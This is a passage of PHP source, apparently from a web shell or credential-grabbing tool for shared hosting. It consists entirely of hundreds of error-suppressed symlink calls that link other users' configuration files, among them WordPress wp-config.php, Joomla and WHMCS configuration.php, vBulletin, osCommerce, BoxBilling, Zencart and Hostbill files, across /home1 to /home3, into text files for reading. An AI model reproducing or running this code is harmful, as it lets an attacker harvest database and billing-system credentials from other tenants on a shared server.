  1603. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1607. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1610. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1613. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1614. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1615. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1617.  
  1618. //Home2
  1619.  
  1620. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1621. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1622. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1623. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1624. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1625. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1626. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1627. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1628. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1629. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1630. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1631. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1632. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1633. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1634. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1645. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1646. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1647. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1648. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1649. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1650. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1651. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1652. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1654. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1657. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1660. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1661. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1662. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1663. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1664. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1665. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1666. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1759. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1771. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1772. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1773. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1774. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1775. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1776. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1777. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1778. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1779. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1780. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1781. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1782. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1783. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1793. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1794. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1795. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1796. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1797. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1798. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1799. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1800.  
  1801. //Home3
  1802.  
  1803. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1804. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1805. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1806. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1807. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1808. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1809. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1810. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1811. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1812. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1813. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1814. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1815. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1816. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1817. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1828. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1829. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1830. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1831. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1832. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1833. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1834. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1835. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1837. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1840. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1843. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1844. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1845. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1846. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1847. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1848. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1849. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1902. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
